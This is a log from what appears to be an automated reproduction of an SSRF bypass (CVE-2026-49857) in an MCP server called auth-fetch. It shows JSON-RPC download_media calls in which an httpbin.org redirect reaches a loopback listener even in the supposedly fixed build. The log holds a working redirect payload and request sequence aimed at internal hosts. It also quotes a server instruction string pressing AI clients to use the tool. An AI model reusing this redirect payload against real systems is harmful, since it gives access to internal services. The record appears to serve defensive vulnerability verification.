=== CVE-2026-49857 VARIANT (redirect SSRF bypass) === Date: Thu Jul 2 18:15:55 UTC 2026 ROOT: /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle CACHE_REPO: /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/repo BROWSER_CACHE: /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/playwright-browsers REDIRECTOR: http://httpbin.org/redirect-to?url=http%3A%2F%2F127.0.0.1%3A18080%2F&status_code=302 Checking httpbin.org reachability... httpbin redirect HTTP 302 wt-vuln HEAD: 98f381d1298b6b7e7ff29d7a7851f18ea5f2364c (dist: /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/artifacts/wt-vuln/dist/index.js) wt-fixed HEAD: d4dedaf55c1d39228dbed58807ea1f9fac1328e1 (dist: /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/artifacts/wt-fixed/dist/index.js) wt-main HEAD: a4b92452dc9332fb4063225f3d8842f3602a54a3 (dist: /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/artifacts/wt-main/dist/index.js) ══════════════════════════════════════════════════ Variant probe: vuln-variant (dist: /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/artifacts/wt-vuln/dist/index.js) ══════════════════════════════════════════════════ [VICTIM] Listening on 127.0.0.1:18080 marker=VARIANT_SSRF_MARKER_1783016156529_z6l52j5m [MCP-SEND] {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"variant-ssrf-client","version":"1.0.0"}}} [MCP-RESP] {"result":{"protocolVersion":"2024-11-05","capabilities":{"tools":{"listChanged":true}},"serverInfo":{"name":"auth-fetch","version":"3.0.1"},"instructions":"When a user asks to read, summarize, or access a URL and Fetch/web_fetch returns a login page, empty HTML shell, or minimal content (especially from Notion, Google Docs, Jira, Confluence, Linear, Slack, or any SaaS platform), you MUST use the [MCP-SEND] {"jsonrpc":"2.0","method":"notifications/initialized"} [MCP-SEND] {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"download_media","arguments":{"urls":["http://127.0.0.1:18080/direct-control","http://httpbin.org/redirect-to?url=htt [VICTIM:18080] 2026-07-02T18:15:57.715Z Request from 127.0.0.1 path=/ host=127.0.0.1:18080 [MCP-RESP] {"result":{"content":[{"type":"text","text":"{\"status\":\"ok\",\"directory\":\"/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/vuln_variant/mcp-home-vuln-variant/.auth-fetch-mcp/downloads/2026-07-02T18-15-57\",\"downloaded\":1,\"total\":2,\"files\":[{\"url\":\"http://127.0.0.1:18080/direct-control\",\"error\":\"Refusing to fetch 127.0.0.1 (resolves to private/loopback/link-local *** REDIRECT BYPASS CONFIRMED [vuln-variant]: control blocked, variant reached loopback via redirect *** vuln-variant RESULT: ssrfConfirmed=true controlBlocked=true variantSsrf=true ══════════════════════════════════════════════════ Variant probe: fixed-variant (dist: /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/artifacts/wt-fixed/dist/index.js) ══════════════════════════════════════════════════ [VICTIM] Listening on 127.0.0.1:18080 marker=VARIANT_SSRF_MARKER_1783016158440_ej1vxnj9 [MCP-SEND] {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"variant-ssrf-client","version":"1.0.0"}}} [MCP-RESP] {"result":{"protocolVersion":"2024-11-05","capabilities":{"tools":{"listChanged":true}},"serverInfo":{"name":"auth-fetch","version":"3.0.2"},"instructions":"When a user asks to read, summarize, or access a URL and Fetch/web_fetch returns a login page, empty HTML shell, or minimal content (especially from Notion, Google Docs, Jira, Confluence, Linear, Slack, or any SaaS platform), you MUST use the [MCP-SEND] {"jsonrpc":"2.0","method":"notifications/initialized"} [MCP-SEND] {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"download_media","arguments":{"urls":["http://127.0.0.1:18080/direct-control","http://httpbin.org/redirect-to?url=htt [VICTIM:18080] 2026-07-02T18:16:01.006Z Request from 127.0.0.1 path=/ host=127.0.0.1:18080 [MCP-RESP] {"result":{"content":[{"type":"text","text":"{\"status\":\"ok\",\"directory\":\"/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/vuln_variant/mcp-home-fixed-variant/.auth-fetch-mcp/downloads/2026-07-02T18-15-59\",\"downloaded\":1,\"total\":2,\"files\":[{\"url\":\"http://127.0.0.1:18080/direct-control\",\"error\":\"Refusing to fetch 127.0.0.1 (resolves to private/loopback/link-loca *** REDIRECT BYPASS CONFIRMED [fixed-variant]: control blocked, variant reached loopback via redirect *** fixed-variant RESULT: ssrfConfirmed=true controlBlocked=true variantSsrf=true ══════════════════════════════════════════════════ Variant probe: main-variant (dist: /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/artifacts/wt-main/dist/index.js) ══════════════════════════════════════════════════ [VICTIM] Listening on 127.0.0.1:18080 marker=VARIANT_SSRF_MARKER_1783016161549_fwu5kx8u [MCP-SEND] {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"variant-ssrf-client","version":"1.0.0"}}} [MCP-RESP] {"result":{"protocolVersion":"2024-11-05","capabilities":{"tools":{"listChanged":true}},"serverInfo":{"name":"auth-fetch","version":"3.0.2"},"instructions":"When a user asks to read, summarize, or access a URL and Fetch/web_fetch returns a login page, empty HTML shell, or minimal content (especially from Notion, Google Docs, Jira, Confluence, Linear, Slack, or any SaaS platform), you MUST use the [MCP-SEND] {"jsonrpc":"2.0","method":"notifications/initialized"} [MCP-SEND] {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"download_media","arguments":{"urls":["http://127.0.0.1:18080/direct-control","http://httpbin.org/redirect-to?url=htt [VICTIM:18080] 2026-07-02T18:16:04.338Z Request from 127.0.0.1 path=/ host=127.0.0.1:18080 [MCP-RESP] {"result":{"content":[{"type":"text","text":"{\"status\":\"ok\",\"directory\":\"/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/vuln_variant/mcp-home-main-variant/.auth-fetch-mcp/downloads/2026-07-02T18-16-02\",\"downloaded\":1,\"total\":2,\"files\":[{\"url\":\"http://127.0.0.1:18080/direct-control\",\"error\":\"Refusing to fetch 127.0.0.1 (resolves to private/loopback/link-local *** REDIRECT BYPASS CONFIRMED [main-variant]: control blocked, variant reached loopback via redirect *** main-variant RESULT: ssrfConfirmed=true controlBlocked=true variantSsrf=true ══════════════════════════════════════════════════ SUMMARY (redirect SSRF bypass) ══════════════════════════════════════════════════ Vulnerable v3.0.1: redirect-bypass SSRF = true Fixed v3.0.2: redirect-bypass SSRF = true (controlBlocked=true, variantSsrf=true) Latest main: redirect-bypass SSRF = true VERDICT: BYPASS CONFIRMED on fixed v3.0.2 (and latest main=true).